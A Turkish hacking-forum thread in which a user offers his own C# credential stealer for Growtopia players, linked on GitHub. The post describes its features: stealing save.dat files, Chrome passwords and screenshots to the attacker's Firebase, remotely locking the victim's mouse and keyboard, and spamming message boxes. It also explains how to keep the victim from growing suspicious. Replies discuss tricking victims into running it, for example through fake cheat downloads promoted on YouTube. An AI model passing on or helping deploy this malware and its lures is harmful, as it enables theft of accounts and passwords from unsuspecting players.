C# Growtopia Save.dat Stealer - Maxidatter

Peyack

Üye
16 Ocak 2019
169
2
127.0.0.1
Merhaba arkadaşlar, kendi yapımım olan growtopia'da kurbanların kullanıcı adı/şifresini çalan programım sizlerle... Daha iyisini yaptığım için bunu paylaşmaya karar verdim. Firebase Database ve Firebase storage ile çalışıyor. Lafı kısa kesip özelliklerine geliyim:

Kill Growtopia : Bu özellik aktif olduğunda Growtopia açılamaz hale gelir. Mantığı Growtopia'yı en öne getirip ALT+F4 çekmesidir. Process.Kill() kullanmak istemiştim fakat programın yönetici olarak açılması gerekiyordu... bende böyle çözümünü bulmuştum.
Lock Mouse : Bu özellik aktif olduğunda mouse kullanamaz hale gelir. Mantığı mouseye random bir yer atamasıdır.
Lock Keyboard. Bu özellik aktif olduğunda klavye kullanamaz hale gelir. Mantığı "TAB" tuşunu sürekli göndermesidir.
ve gelelim son ve değişik olan özelliğe... Ben buna PC çökertici adını verdim, 100 milisaniyede bir kurbana Message Box gönderir. MessageBox içerigini database'den çekmek aklıma gelmişti fakat üşengeçlikten yapmamıştım... isteyen arkadaş öyle yapabilir.
Ayrıca ek olarak Save.dat'ı, Google Chrome şifrelerini ve masaüstü ekran görüntüsünü bir timer ile belirli dakikalar/saatler içerisinde çekebilirsiniz. Bu süreyi kendinize göre belirleyebilirsiniz.

Peki gelelim bu özellikleri nasıl açıcağız?
Veriler Firebase Database içerisinde şu şekilde oluyor:
+++Kurbanın HDD Seriali
++++Random sayılar(programın ilk açıldıgında çekilen veriler burada olucak)
++++timer_logs-- özellikleri açıcagımız yer burası...
hemen şöyle fotografını koyayım timer_logs'un:

rJWNqQ.png


"D" yazan harfleri "A" ya çevirirseniz çalışmaya başlıyacaktır. Çalışmaya başlaması biraz zaman alabilir, bu zamanıda kısaltabilirsiniz fakat program daha fazla RAM tüketmeye başlar ve kurban şüphelebilir.

Peki save.dat, google chrome, ekran görüntüleri nerede tutulacak?
Arkadaşlar bunlarda dosya olarak geliceği için Firebase Storage içerisinde tutuluyor.

Github linki: https://github.com/maxmanusv1/Maxidatter---Growtopia-Savedat-Stealer
 

Fantaco

Yeni üye
28 Mar 2020
20
0
bende growtopi oynuyorum bendede visual studiodan yapma savedat stealer var ama kimseye yediremiyorum bi taktiğin varmı ?
 

Peyack

Üye
16 Ocak 2019
169
2
127.0.0.1
bende growtopi oynuyorum bendede visual studiodan yapma savedat stealer var ama kimseye yediremiyorum bi taktiğin varmı ?
Taktiklerim çoğu kişinin kullandığı gibi değil. En çok kullanılan taktik Youtubeden hilemi indirin diye kurban aramak. Fakat bunu kullanmıyorum genel olarak.

Peki bunu karsı tarafa nasıl yedireceğiz. Ip vb birşey mi lazım
Bu programı visual studio ile solution dosyasından açıcaksın. Ondan sonra kendi Firebase Database'ine/Storage'ine bağlıyacaksın. Buildlediginde oluşan .exe'yi kurban açtığında veriler Database'ine ve storage'ine düşücek.
 

Medhixİnt

Yeni üye
4 May 2023
5
0
Hocam bir sorum olucak :
Kendi save.dat'ım elimde fakat , burada kendi growid ve passwordum nerede yaziyor bulamadim yardimci olabilirmisiniz?
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.